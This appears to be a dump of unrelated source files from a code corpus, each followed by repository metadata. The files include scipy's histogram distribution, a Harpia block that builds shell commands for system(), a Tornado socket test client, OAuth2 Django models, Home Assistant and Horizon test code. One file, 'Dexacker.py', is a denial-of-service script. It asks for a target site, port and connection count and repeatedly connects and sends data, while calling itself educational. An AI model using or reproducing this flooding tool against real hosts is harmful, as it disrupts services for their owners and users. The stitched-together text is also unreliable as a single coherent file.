>>> hist_dist.pdf(np.max(data))
0.0
>>> hist_dist.cdf(np.max(data))
1.0
>>> hist_dist.pdf(np.min(data))
7.7591907244498314e-05
>>> hist_dist.cdf(np.min(data))
0.0
PDF and CDF follow the histogram
>>> import matplotlib.pyplot as plt
>>> X = np.linspace(-5.0, 5.0, 100)
>>> plt.title("PDF from Template")
>>> plt.hist(data, density=True, bins=100)
>>> plt.plot(X, hist_dist.pdf(X), label='PDF')
>>> plt.plot(X, hist_dist.cdf(X), label='CDF')
>>> plt.show()
"""
_support_mask = rv_continuous._support_mask
def __init__(self, histogram, *args, **kwargs):
"""
Create a new distribution using the given histogram
Parameters
----------
histogram : tuple of array_like
Tuple containing two array_like objects
The first containing the content of n bins
The second containing the (n+1) bin boundaries
            In particular, the return value of np.histogram is accepted
"""
self._histogram = histogram
if len(histogram) != 2:
raise ValueError("Expected length 2 for parameter histogram")
self._hpdf = np.asarray(histogram[0])
self._hbins = np.asarray(histogram[1])
if len(self._hpdf) + 1 != len(self._hbins):
raise ValueError("Number of elements in histogram content "
"and histogram boundaries do not match, "
"expected n and n+1.")
self._hbin_widths = self._hbins[1:] - self._hbins[:-1]
self._hpdf = self._hpdf / float(np.sum(self._hpdf * self._hbin_widths))
self._hcdf = np.cumsum(self._hpdf * self._hbin_widths)
self._hpdf = np.hstack([0.0, self._hpdf, 0.0])
self._hcdf = np.hstack([0.0, self._hcdf])
# Set support
kwargs['a'] = self.a = self._hbins[0]
kwargs['b'] = self.b = self._hbins[-1]
super(rv_histogram, self).__init__(*args, **kwargs)
def _pdf(self, x):
"""
PDF of the histogram
"""
return self._hpdf[np.searchsorted(self._hbins, x, side='right')]
def _cdf(self, x):
"""
CDF calculated from the histogram
"""
return np.interp(x, self._hbins, self._hcdf)
def _ppf(self, x):
"""
Percentile function calculated from the histogram
"""
return np.interp(x, self._hcdf, self._hbins)
def _munp(self, n):
"""Compute the n-th non-central moment."""
integrals = (self._hbins[1:]**(n+1) - self._hbins[:-1]**(n+1)) / (n+1)
return np.sum(self._hpdf[1:-1] * integrals)
def _entropy(self):
"""Compute entropy of distribution"""
res = _lazywhere(self._hpdf[1:-1] > 0.0,
(self._hpdf[1:-1],),
np.log,
0.0)
return -np.sum(self._hpdf[1:-1] * res * self._hbin_widths)
def _updated_ctor_param(self):
"""
Set the histogram as additional constructor argument
"""
dct = super(rv_histogram, self)._updated_ctor_param()
dct['histogram'] = self._histogram
return dct
# Collect names of classes and objects in this module.
pairs = list(globals().items())
_distn_names, _distn_gen_names = get_distribution_names(pairs, rv_continuous)
__all__ = _distn_names + _distn_gen_names + ['rv_histogram']
|
gertingold/scipy
|
scipy/stats/_continuous_distns.py
|
Python
|
bsd-3-clause
| 220,936 | 0.000751 |
# -*- coding: utf-8 -*-
# [HARPIA PROJECT]
#
#
# S2i - Intelligent Industrial Systems
# DAS - Automation and Systems Department
# UFSC - Federal University of Santa Catarina
# Copyright: 2006 - 2007 Luis Carlos Dill Junges (lcdjunges@yahoo.com.br), Clovis Peruchi Scotti (scotti@ieee.org),
# Guilherme Augusto Rutzen (rutzen@das.ufsc.br), Mathias Erdtmann (erdtmann@gmail.com) and S2i (www.s2i.das.ufsc.br)
# 2007 - 2009 Clovis Peruchi Scotti (scotti@ieee.org), S2i (www.s2i.das.ufsc.br)
#
#
# This program is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License version 3, as published
# by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranties of
# MERCHANTABILITY, SATISFACTORY QUALITY, or FITNESS FOR A PARTICULAR
# PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program. If not, see <http://www.gnu.org/licenses/>.
#
# For further information, check the COPYING file distributed with this software.
#
# ----------------------------------------------------------------------
import gtk
from harpia.GladeWindow import GladeWindow
from harpia.s2icommonproperties import S2iCommonProperties, APP, DIR
# i18n
import os
from harpia.utils.XMLUtils import XMLParser
import gettext
_ = gettext.gettext
gettext.bindtextdomain(APP, DIR)
gettext.textdomain(APP)
# ----------------------------------------------------------------------
class Properties(GladeWindow, S2iCommonProperties):
# ----------------------------------------------------------------------
def __init__(self, PropertiesXML, S2iBlockProperties):
self.m_sDataDir = os.environ['HARPIA_DATA_DIR']
filename = self.m_sDataDir + 'glade/runCmd.ui'
self.m_oPropertiesXML = PropertiesXML
self.m_oS2iBlockProperties = S2iBlockProperties
widget_list = [
'Properties',
'cmdString',
'BackgroundColor',
'BorderColor',
'HelpView',
'enIsntZero'
]
handlers = [
'on_cancel_clicked',
'on_prop_confirm_clicked',
'on_BackColorButton_clicked',
'on_BorderColorButton_clicked'
]
top_window = 'Properties'
GladeWindow.__init__(self, filename, top_window, widget_list, handlers)
# load properties values
self.block_properties = self.m_oPropertiesXML.getTag("properties").getTag("block").getChildTags("property")
for Property in self.block_properties:
if Property.name == "cmdString":
self.widgets['cmdString'].set_text(Property.value)
if Property.name == "enIsntZero":
self.widgets['enIsntZero'].set_active(Property.value == "True")
self.configure()
# load help text
# t_oS2iHelp = XMLParser(self.m_sDataDir + "help/runCmd" + _("_en.help"))
# t_oTextBuffer = gtk.TextBuffer()
# t_oTextBuffer.set_text(unicode(str(t_oS2iHelp.getTag("help").getTag("content").getTagContent())))
# self.widgets['HelpView'].set_buffer(t_oTextBuffer)
#----------------Help Text--------------------------------------
    def getHelp(self):  # help text added
        return "Runs a system call depending on the binary evaluation of pixel (0,0) of the input image."
# ----------------------------------------------------------------------
def __del__(self):
pass
# ----------------------------------------------------------------------
def on_prop_confirm_clicked(self, *args):
for Property in self.block_properties:
if Property.name == "cmdString":
Property.value = unicode(self.widgets['cmdString'].get_text())
if Property.name == "enIsntZero":
Property.value = unicode(self.widgets['enIsntZero'].get_active())
self.m_oS2iBlockProperties.SetPropertiesXML(self.m_oPropertiesXML)
self.m_oS2iBlockProperties.SetBorderColor(self.m_oBorderColor)
self.m_oS2iBlockProperties.SetBackColor(self.m_oBackColor)
self.widgets['Properties'].destroy()
# ----------------------------------------------------------------------
# propProperties = Properties()()
# propProperties.show( center=0 )
# ------------------------------------------------------------------------------
# Code generation
# ------------------------------------------------------------------------------
def generate(blockTemplate):
cmdString = 'echo no properties'
enIsntZero = False
for propIter in blockTemplate.properties:
if propIter[0] == 'cmdString':
cmdString = propIter[1]
if propIter[0] == 'enIsntZero':
enIsntZero = (propIter[1] == "True")
cmdString = cmdString.replace(r"'", r"\'")
cmdString = cmdString.replace(r'"', r'\"')
blockTemplate.imagesIO = \
'double block$$_double_i1;\n' + \
'double block$$_double_o1;\n'
blockTemplate.functionCall = '\nif('
if enIsntZero:
blockTemplate.functionCall += 'block$$_double_i1 > 0.0){\n'
else:
blockTemplate.functionCall += '1){\n'
blockTemplate.functionCall += 'char outPutStr[' + str(len(cmdString) + 30) + '];\n' + \
'snprintf(outPutStr,' + str(len(
cmdString) + 30) + ',"export HRP_DB=%f;' + cmdString + '",(float)block$$_double_i1);' + \
'system(outPutStr);}\n' + \
'block$$_double_o1 = block$$_double_i1;\n'
blockTemplate.dealloc = '//nothing to deallocate\n'
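# For reference, with cmdString = 'ls' and enIsntZero = True the template
# above emits C code along these lines (sketch, whitespace simplified):
#
#     if(block$$_double_i1 > 0.0){
#     char outPutStr[32];
#     snprintf(outPutStr,32,"export HRP_DB=%f;ls",(float)block$$_double_i1);
#     system(outPutStr);}
#     block$$_double_o1 = block$$_double_i1;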
# ------------------------------------------------------------------------------
# Block Setup
# ------------------------------------------------------------------------------
def getBlock():
return {"Label": _("Run Command"),
"Path": {"Python": "runCmd",
"Glade": "glade/runCmd.ui",
"Xml": "xml/runCmd.xml"},
"Icon": "images/runCmd.png",
"Color": "200:200:60:150",
"InTypes": {0: "HRP_DOUBLE"},
"OutTypes": {0: "HRP_DOUBLE"},
"Description": _("Runs a shell command depending on the input value."),
"TreeGroup": _("Experimental")
}
|
Exterminus/harpia
|
harpia/bpGUI/runCmd.py
|
Python
|
gpl-2.0
| 6,533 | 0.002756 |
#coding=utf-8
#-*- encoding: utf-8 -*-
import tornado.ioloop
import tornado.iostream
import socket
import struct
import NotifyTCPServer
def readPacketHeader():
stream.read_bytes(NotifyTCPServer.PACKET_HEADER_LEN, parsePacketHeader)
def parsePacketHeader(data):
    # 'command' is consumed by parsePacketBody; without the global
    # declaration the assignment below would only create a local name.
    global command
    sign, cmd, bodySize = struct.unpack('>2sHH', data)
    print "Sign: %s, Command: %s, Size: %s" % (sign, cmd, bodySize)
    command = cmd
    stream.read_bytes(bodySize, parsePacketBody)
def parsePacketBody(data):
print "Data: %s" % str(data)
if command == NotifyTCPServer.NOTIFY_COMMAND_PING:
send_ping(data)
readPacketHeader()
def send_register(userKey):
send_packet(NotifyTCPServer.NOTIFY_COMMAND_REGISTER, userKey)
def send_ping(msg):
send_packet(NotifyTCPServer.NOTIFY_COMMAND_PING, msg)
def send_packet(cmd, msg):
data = bytes(msg)
stream.write(struct.pack(">2sHH", "NT", cmd, len(data)))
stream.write(data)
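# Wire-format recap: every packet is a 6-byte big-endian header -- the
# 2-byte sign "NT", an unsigned-short command and an unsigned-short body
# length -- followed by the body itself. A minimal round-trip sketch
# (illustrative values only):
def demo_packet_roundtrip(cmd=1, msg="hello"):
    header = struct.pack(">2sHH", "NT", cmd, len(msg))
    sign, cmd2, size = struct.unpack(">2sHH", header)
    assert (sign, cmd2, size) == ("NT", cmd, len(msg))
    return header + msg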
def send_request():
readPacketHeader()
send_register('591410cbf9614cbf9aaac4a871ddb466')
command=0
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
stream = tornado.iostream.IOStream(s)
stream.connect(("localhost", 9002), send_request)
#stream.connect(("221.180.20.232", 9002), send_request)
tornado.ioloop.IOLoop.instance().start()
|
xaccc/videoapiserver
|
testNotifyTCPServer.py
|
Python
|
gpl-2.0
| 1,234 | 0.024311 |
#! /usr/bin/env python
import sys, os
sys.path.append('./include/python')
import proteomatic
import string
import re
class TransposeDna(proteomatic.ProteomaticScript):
def run(self):
# convert all characters to upper case
# Attention: parameters are Unicode because of the JSON parser
# used behind the scenes, convert nucleotides to ASCII string
dna = str(self.param['nucleotides']).upper()
# remove invalid characters
dna = re.sub('[^ACGT]', '', dna)
# reverse sequence
dna = dna[::-1]
# replace nucleotides
dna = dna.translate(string.maketrans('ACGT', 'TGCA'))
# output transposed DNA
print(dna)
if 'result' in self.output:
with open(self.output['result'], 'w') as f:
f.write(dna + "\n")
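# Worked example of the steps in run() above (illustrative input): 'atg-cx'
# is upper-cased to 'ATG-CX', filtered to 'ATGC', reversed to 'CGTA' and
# complemented to 'GCAT' -- the reverse complement of 'ATGC'.
def _reverse_complement_demo(seq='atg-cx'):
    s = re.sub('[^ACGT]', '', str(seq).upper())[::-1]
    return s.translate(string.maketrans('ACGT', 'TGCA'))  # -> 'GCAT'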
if __name__ == '__main__':
script = TransposeDna()
|
specht/proteomatic-scripts
|
transpose-dna.defunct.py
|
Python
|
gpl-3.0
| 911 | 0.009879 |
#-*- coding: utf-8 -*-
"""OAuth 2.0 Django Models"""
import time
from hashlib import sha512
from uuid import uuid4
from django.db import models
from django.contrib.auth.models import User
from .consts import CLIENT_KEY_LENGTH, CLIENT_SECRET_LENGTH
from .consts import SCOPE_LENGTH
from .consts import ACCESS_TOKEN_LENGTH, REFRESH_TOKEN_LENGTH
from .consts import ACCESS_TOKEN_EXPIRATION, MAC_KEY_LENGTH, REFRESHABLE
from .consts import CODE_KEY_LENGTH, CODE_EXPIRATION
from djangotoolbox.fields import ListField
class TimestampGenerator(object):
"""Callable Timestamp Generator that returns a UNIX time integer.
**Kwargs:**
    * *seconds:* An integer indicating how many seconds in the future the
timestamp should be. *Default 0*
*Returns int*
"""
def __init__(self, seconds=0):
self.seconds = seconds
def __call__(self):
return int(time.time()) + self.seconds
class KeyGenerator(object):
"""Callable Key Generator that returns a random keystring.
**Args:**
    * *length:* An integer indicating how long the key should be.
*Returns str*
"""
def __init__(self, length):
self.length = length
def __call__(self):
return sha512(uuid4().hex).hexdigest()[0:self.length]
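# Both generators are handed to Django field defaults below as *callables*
# (class instances defining __call__), so a fresh value is produced for
# every new row rather than once at import time. A small illustrative
# sketch of what calling them yields:
def _generator_demo():
    make_key = KeyGenerator(8)
    expire_at = TimestampGenerator(seconds=60)
    # e.g. ('3f2a9c1d', <UNIX time 60 seconds from now>)
    return make_key(), expire_at()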
class Client(models.Model):
"""Stores client authentication data.
**Args:**
* *name:* A string representing the client name.
* *user:* A django.contrib.auth.models.User object representing the client
owner.
**Kwargs:**
* *description:* A string representing the client description.
*Default None*
* *key:* A string representing the client key. *Default 30 character
random string*
* *secret:* A string representing the client secret. *Default 30 character
random string*
* *redirect_uri:* A string representing the client redirect_uri.
*Default None*
"""
name = models.CharField(max_length=256)
user = models.ForeignKey(User)
description = models.TextField(null=True, blank=True)
key = models.CharField(
unique=True,
max_length=CLIENT_KEY_LENGTH,
default=KeyGenerator(CLIENT_KEY_LENGTH),
db_index=True)
secret = models.CharField(
unique=True,
max_length=CLIENT_SECRET_LENGTH,
default=KeyGenerator(CLIENT_SECRET_LENGTH))
redirect_uri = models.URLField(null=True)
class AccessRange(models.Model):
"""Stores access range data, also known as scope.
**Args:**
* *key:* A string representing the access range scope. Used in access
token requests.
**Kwargs:**
* *description:* A string representing the access range description.
*Default None*
"""
key = models.CharField(unique=True, max_length=SCOPE_LENGTH, db_index=True)
description = models.TextField(blank=True)
class AccessToken(models.Model):
"""Stores access token data.
**Args:**
* *client:* A oauth2app.models.Client object
* *user:* A django.contrib.auth.models.User object
**Kwargs:**
* *token:* A string representing the access key token. *Default 10
character random string*
* *refresh_token:* A string representing the access key token. *Default 10
character random string*
* *mac_key:* A string representing the MAC key. *Default None*
* *expire:* A positive integer timestamp representing the access token's
expiration time.
* *scope:* A list of oauth2app.models.AccessRange objects. *Default None*
* *refreshable:* A boolean that indicates whether this access token is
refreshable. *Default False*
"""
client = models.ForeignKey(Client)
user = models.ForeignKey(User)
token = models.CharField(
unique=True,
max_length=ACCESS_TOKEN_LENGTH,
default=KeyGenerator(ACCESS_TOKEN_LENGTH),
db_index=True)
refresh_token = models.CharField(
unique=True,
blank=True,
null=True,
max_length=REFRESH_TOKEN_LENGTH,
default=KeyGenerator(REFRESH_TOKEN_LENGTH),
db_index=True)
mac_key = models.CharField(
blank=True,
null=True,
max_length=MAC_KEY_LENGTH,
default=None)
issue = models.PositiveIntegerField(
editable=False,
default=TimestampGenerator())
expire = models.PositiveIntegerField(
default=TimestampGenerator(ACCESS_TOKEN_EXPIRATION))
scope = ListField()
refreshable = models.BooleanField(default=REFRESHABLE)
class Code(models.Model):
"""Stores authorization code data.
**Args:**
* *client:* A oauth2app.models.Client object
* *user:* A django.contrib.auth.models.User object
**Kwargs:**
* *key:* A string representing the authorization code. *Default 30
character random string*
* *expire:* A positive integer timestamp representing the access token's
expiration time.
* *redirect_uri:* A string representing the redirect_uri provided by the
requesting client when the code was issued. *Default None*
* *scope:* A list of oauth2app.models.AccessRange objects. *Default None*
"""
client = models.ForeignKey(Client)
user = models.ForeignKey(User)
key = models.CharField(
unique=True,
max_length=CODE_KEY_LENGTH,
default=KeyGenerator(CODE_KEY_LENGTH),
db_index=True)
issue = models.PositiveIntegerField(
editable=False,
default=TimestampGenerator())
expire = models.PositiveIntegerField(
default=TimestampGenerator(CODE_EXPIRATION))
redirect_uri = models.URLField(null=True)
scope = ListField()
class MACNonce(models.Model):
"""Stores Nonce strings for use with MAC Authentication.
**Args:**
* *access_token:* A oauth2app.models.AccessToken object
* *nonce:* A unique nonce string.
"""
access_token = models.ForeignKey(AccessToken)
nonce = models.CharField(max_length=30, db_index=True)
|
xrage/oauth2app-mongoDb
|
oauth2app/models.py
|
Python
|
mit
| 5,945 | 0.000168 |
#!/usr/bin/env python
#______________________________________#
#Dexacker is an open source tool developed by Abdelmadjd Cherfaoui
#Dexacker is designed for Educational Stuff to do a LEGAL DDOS Test and the developers are
# not responsible for ILLEGAL USES
#Contacting using:@Hexacker | fb.com/Hexacker
#http://www.hackercademy.com
#http://www.bringitsimple.com
#______________________________________#
#Importing Modules
import socket,os,sys,string
#Launching Tool
print "Launching Dexacker..."
print "Remember that Dexacker is an Educational Tool\nand you are responsible for any ILLEGAL USES\nThe Developer is not responsible for your behaviors "
#Default Settings
host = raw_input("Enter the website you want to DDOS: ")
port = int(raw_input("Enter the port you want to Attack: "))
message = raw_input("Write the message you want to send it: ")
connections = int(raw_input("How many connections you want to make: "))
IP = socket.gethostbyname(host)
#/
#The Attacking Function
def Attack():
attack = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
attack.connect((host,80))
attack.send(message)
attack.sendto(message, (IP,port))
attack.send(message);
except socket.error,msg:
print "Connection Failed"
print "DDOS Attack Lunched"
attack.close()
for i in range(1,connections):
Attack()
print "______________________________________"
print "The Operation is finished"
#this is the restarting function
def Restart():
program = sys.executable
os.execl(program,program,* sys.argv)
CurDirectory = os.getcwd()
if __name__ == "__main__":
    request = raw_input("Do you want to start over? Y or N: ")
if request.strip() in "y Y yes Yes YES YEs yES".split():
Restart()
else:
os.system(CurDirectory+"Dexacker.py")
|
Hexacker/Dexacker
|
Dexacker.py
|
Python
|
gpl-2.0
| 1,733 | 0.030006 |
"""Describe group states."""
from homeassistant.components.group import GroupIntegrationRegistry
from homeassistant.const import STATE_OK, STATE_PROBLEM
from homeassistant.core import HomeAssistant, callback
@callback
def async_describe_on_off_states(
hass: HomeAssistant, registry: GroupIntegrationRegistry
) -> None:
"""Describe group on off states."""
registry.on_off_states({STATE_PROBLEM}, STATE_OK)
|
jawilson/home-assistant
|
homeassistant/components/plant/group.py
|
Python
|
apache-2.0
| 421 | 0 |
# Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import django
from django.conf import settings
from django.core.urlresolvers import reverse
from django.forms import widgets
from django import http
from mox import IsA # noqa
from openstack_dashboard import api
from openstack_dashboard.api import cinder
from openstack_dashboard.dashboards.project.volumes \
.volumes import tables
from openstack_dashboard.test import helpers as test
from openstack_dashboard.usage import quotas
VOLUME_INDEX_URL = reverse('horizon:project:volumes:index')
VOLUME_VOLUMES_TAB_URL = reverse('horizon:project:volumes:volumes_tab')
class VolumeViewTests(test.TestCase):
@test.create_stubs({cinder: ('volume_create',
'volume_snapshot_list',
'volume_type_list',
'volume_list',
'availability_zone_list',
'extension_supported'),
api.glance: ('image_list_detailed',),
quotas: ('tenant_limit_usages',)})
def test_create_volume(self):
volume = self.cinder_volumes.first()
volume_type = self.volume_types.first()
az = self.cinder_availability_zones.first().zoneName
usage_limit = {'maxTotalVolumeGigabytes': 250,
'gigabytesUsed': 20,
'volumesUsed': len(self.cinder_volumes.list()),
'maxTotalVolumes': 6}
formData = {'name': u'A Volume I Am Making',
'description': u'This is a volume I am making for a test.',
'method': u'CreateForm',
'type': volume_type.name,
'size': 50,
'snapshot_source': '',
'availability_zone': az}
cinder.volume_type_list(IsA(http.HttpRequest)).\
AndReturn(self.volume_types.list())
quotas.tenant_limit_usages(IsA(http.HttpRequest)).\
AndReturn(usage_limit)
cinder.volume_snapshot_list(IsA(http.HttpRequest)).\
AndReturn(self.cinder_volume_snapshots.list())
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'is_public': True,
'status': 'active'}) \
.AndReturn([self.images.list(), False, False])
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'property-owner_id': self.tenant.id,
'status': 'active'}) \
.AndReturn([[], False, False])
cinder.availability_zone_list(IsA(http.HttpRequest)).AndReturn(
self.cinder_availability_zones.list())
cinder.extension_supported(IsA(http.HttpRequest), 'AvailabilityZones')\
.AndReturn(True)
cinder.volume_list(IsA(
http.HttpRequest)).AndReturn(self.cinder_volumes.list())
cinder.volume_create(IsA(http.HttpRequest),
formData['size'],
formData['name'],
formData['description'],
formData['type'],
metadata={},
snapshot_id=None,
image_id=None,
availability_zone=formData['availability_zone'],
source_volid=None)\
.AndReturn(volume)
self.mox.ReplayAll()
url = reverse('horizon:project:volumes:volumes:create')
res = self.client.post(url, formData)
redirect_url = VOLUME_VOLUMES_TAB_URL
self.assertRedirectsNoFollow(res, redirect_url)
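    # The mox record/replay pattern used throughout these tests: the
    # @test.create_stubs decorator stubs out the listed API calls, the
    # expectations above record them, and ReplayAll() switches mox into
    # replay mode so any missing or unexpected call fails the test. A
    # minimal illustrative sketch of the same idea:
    #
    #     self.mox.StubOutWithMock(cinder, 'volume_get')
    #     cinder.volume_get(IsA(http.HttpRequest), volume.id) \
    #         .AndReturn(volume)
    #     self.mox.ReplayAll()   # expectations are now enforced
    #     ...exercise the view; mox verifies the calls on teardown...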
@test.create_stubs({cinder: ('volume_create',
'volume_snapshot_list',
'volume_type_list',
'volume_list',
'availability_zone_list',
'extension_supported'),
api.glance: ('image_list_detailed',),
quotas: ('tenant_limit_usages',)})
def test_create_volume_dropdown(self):
volume = self.cinder_volumes.first()
usage_limit = {'maxTotalVolumeGigabytes': 250,
'gigabytesUsed': 20,
'volumesUsed': len(self.cinder_volumes.list()),
'maxTotalVolumes': 6}
formData = {'name': u'A Volume I Am Making',
'description': u'This is a volume I am making for a test.',
'method': u'CreateForm',
'size': 50,
'type': '',
'volume_source_type': 'no_source_type',
'snapshot_source': self.cinder_volume_snapshots.first().id,
'image_source': self.images.first().id}
cinder.volume_type_list(IsA(http.HttpRequest)).\
AndReturn(self.volume_types.list())
cinder.volume_snapshot_list(IsA(http.HttpRequest)).\
AndReturn(self.cinder_volume_snapshots.list())
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'is_public': True,
'status': 'active'}) \
.AndReturn([self.images.list(), False, False])
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'property-owner_id': self.tenant.id,
'status': 'active'}) \
.AndReturn([[], False, False])
cinder.volume_list(IsA(
http.HttpRequest)).AndReturn(self.cinder_volumes.list())
quotas.tenant_limit_usages(IsA(http.HttpRequest)).\
AndReturn(usage_limit)
cinder.extension_supported(IsA(http.HttpRequest), 'AvailabilityZones')\
.AndReturn(True)
cinder.availability_zone_list(IsA(http.HttpRequest)).AndReturn(
self.cinder_availability_zones.list())
cinder.volume_create(IsA(http.HttpRequest),
formData['size'],
formData['name'],
formData['description'],
'',
metadata={},
snapshot_id=None,
image_id=None,
availability_zone=None,
source_volid=None).AndReturn(volume)
self.mox.ReplayAll()
url = reverse('horizon:project:volumes:volumes:create')
res = self.client.post(url, formData)
redirect_url = VOLUME_VOLUMES_TAB_URL
self.assertRedirectsNoFollow(res, redirect_url)
@test.create_stubs({cinder: ('volume_create',
'volume_snapshot_get',
'volume_get',
'volume_type_list'),
quotas: ('tenant_limit_usages',)})
def test_create_volume_from_snapshot(self):
volume = self.cinder_volumes.first()
usage_limit = {'maxTotalVolumeGigabytes': 250,
'gigabytesUsed': 20,
'volumesUsed': len(self.cinder_volumes.list()),
'maxTotalVolumes': 6}
snapshot = self.cinder_volume_snapshots.first()
formData = {'name': u'A Volume I Am Making',
'description': u'This is a volume I am making for a test.',
'method': u'CreateForm',
'size': 50,
'type': '',
'snapshot_source': snapshot.id}
cinder.volume_type_list(IsA(http.HttpRequest)).\
AndReturn(self.volume_types.list())
quotas.tenant_limit_usages(IsA(http.HttpRequest)).\
AndReturn(usage_limit)
cinder.volume_snapshot_get(IsA(http.HttpRequest),
str(snapshot.id)).AndReturn(snapshot)
cinder.volume_get(IsA(http.HttpRequest), snapshot.volume_id).\
AndReturn(self.cinder_volumes.first())
cinder.volume_create(IsA(http.HttpRequest),
formData['size'],
formData['name'],
formData['description'],
'',
metadata={},
snapshot_id=snapshot.id,
image_id=None,
availability_zone=None,
source_volid=None).AndReturn(volume)
self.mox.ReplayAll()
# get snapshot from url
url = reverse('horizon:project:volumes:volumes:create')
res = self.client.post("?".join([url,
"snapshot_id=" + str(snapshot.id)]),
formData)
redirect_url = VOLUME_VOLUMES_TAB_URL
self.assertRedirectsNoFollow(res, redirect_url)
@test.create_stubs({cinder: ('volume_create',
'volume_get',
'volume_list',
'volume_type_list',
'availability_zone_list',
'volume_snapshot_get',
'volume_snapshot_list',
'extension_supported'),
api.glance: ('image_list_detailed',),
quotas: ('tenant_limit_usages',)})
def test_create_volume_from_volume(self):
volume = self.cinder_volumes.first()
usage_limit = {'maxTotalVolumeGigabytes': 250,
'gigabytesUsed': 20,
'volumesUsed': len(self.cinder_volumes.list()),
'maxTotalVolumes': 6}
formData = {'name': u'A copy of a volume',
'description': u'This is a volume I am making for a test.',
'method': u'CreateForm',
'size': 50,
'type': '',
'volume_source_type': 'volume_source',
'volume_source': volume.id}
cinder.volume_list(IsA(http.HttpRequest)).\
AndReturn(self.cinder_volumes.list())
cinder.volume_type_list(IsA(http.HttpRequest)).\
AndReturn(self.volume_types.list())
cinder.volume_snapshot_list(IsA(http.HttpRequest)).\
AndReturn(self.cinder_volume_snapshots.list())
quotas.tenant_limit_usages(IsA(http.HttpRequest)).\
AndReturn(usage_limit)
cinder.volume_get(IsA(http.HttpRequest),
volume.id).AndReturn(self.cinder_volumes.first())
cinder.extension_supported(IsA(http.HttpRequest),
'AvailabilityZones').AndReturn(True)
cinder.availability_zone_list(IsA(http.HttpRequest)).AndReturn(
self.cinder_availability_zones.list())
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'is_public': True,
'status': 'active'}) \
.AndReturn([self.images.list(), False, False])
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'property-owner_id': self.tenant.id,
'status': 'active'}) \
.AndReturn([[], False, False])
cinder.volume_create(IsA(http.HttpRequest),
formData['size'],
formData['name'],
formData['description'],
'',
metadata={},
snapshot_id=None,
image_id=None,
availability_zone=None,
source_volid=volume.id).AndReturn(volume)
self.mox.ReplayAll()
url = reverse('horizon:project:volumes:volumes:create')
redirect_url = VOLUME_VOLUMES_TAB_URL
res = self.client.post(url, formData)
self.assertNoFormErrors(res)
self.assertMessageCount(info=1)
self.assertRedirectsNoFollow(res, redirect_url)
@test.create_stubs({cinder: ('volume_create',
'volume_snapshot_list',
'volume_snapshot_get',
'volume_get',
'volume_list',
'volume_type_list',
'availability_zone_list',
'extension_supported'),
api.glance: ('image_list_detailed',),
quotas: ('tenant_limit_usages',)})
def test_create_volume_from_snapshot_dropdown(self):
volume = self.cinder_volumes.first()
usage_limit = {'maxTotalVolumeGigabytes': 250,
'gigabytesUsed': 20,
'volumesUsed': len(self.cinder_volumes.list()),
'maxTotalVolumes': 6}
snapshot = self.cinder_volume_snapshots.first()
formData = {'name': u'A Volume I Am Making',
'description': u'This is a volume I am making for a test.',
'method': u'CreateForm',
'size': 50,
'type': '',
'volume_source_type': 'snapshot_source',
'snapshot_source': snapshot.id}
cinder.volume_type_list(IsA(http.HttpRequest)).\
AndReturn(self.volume_types.list())
cinder.volume_snapshot_list(IsA(http.HttpRequest)).\
AndReturn(self.cinder_volume_snapshots.list())
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'is_public': True,
'status': 'active'}) \
.AndReturn([self.images.list(), False, False])
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'property-owner_id': self.tenant.id,
'status': 'active'}) \
.AndReturn([[], False, False])
cinder.volume_list(IsA(
http.HttpRequest)).AndReturn(self.cinder_volumes.list())
quotas.tenant_limit_usages(IsA(http.HttpRequest)).\
AndReturn(usage_limit)
cinder.volume_snapshot_get(IsA(http.HttpRequest),
str(snapshot.id)).AndReturn(snapshot)
cinder.extension_supported(IsA(http.HttpRequest), 'AvailabilityZones')\
.AndReturn(True)
cinder.availability_zone_list(IsA(http.HttpRequest)).AndReturn(
self.cinder_availability_zones.list())
cinder.volume_create(IsA(http.HttpRequest),
formData['size'],
formData['name'],
formData['description'],
'',
metadata={},
snapshot_id=snapshot.id,
image_id=None,
availability_zone=None,
source_volid=None).AndReturn(volume)
self.mox.ReplayAll()
# get snapshot from dropdown list
url = reverse('horizon:project:volumes:volumes:create')
res = self.client.post(url, formData)
redirect_url = VOLUME_VOLUMES_TAB_URL
self.assertRedirectsNoFollow(res, redirect_url)
@test.create_stubs({cinder: ('volume_snapshot_get',
'volume_type_list',
'volume_get'),
api.glance: ('image_list_detailed',),
quotas: ('tenant_limit_usages',)})
def test_create_volume_from_snapshot_invalid_size(self):
usage_limit = {'maxTotalVolumeGigabytes': 100,
'gigabytesUsed': 20,
'volumesUsed': len(self.cinder_volumes.list()),
'maxTotalVolumes': 6}
snapshot = self.cinder_volume_snapshots.first()
formData = {'name': u'A Volume I Am Making',
'description': u'This is a volume I am making for a test.',
'method': u'CreateForm',
'size': 20, 'snapshot_source': snapshot.id}
cinder.volume_type_list(IsA(http.HttpRequest)).\
AndReturn(self.volume_types.list())
quotas.tenant_limit_usages(IsA(http.HttpRequest)).\
AndReturn(usage_limit)
cinder.volume_snapshot_get(IsA(http.HttpRequest),
str(snapshot.id)).AndReturn(snapshot)
cinder.volume_get(IsA(http.HttpRequest), snapshot.volume_id).\
AndReturn(self.cinder_volumes.first())
quotas.tenant_limit_usages(IsA(http.HttpRequest)).\
AndReturn(usage_limit)
self.mox.ReplayAll()
url = reverse('horizon:project:volumes:volumes:create')
res = self.client.post("?".join([url,
"snapshot_id=" + str(snapshot.id)]),
formData, follow=True)
self.assertEqual(res.redirect_chain, [])
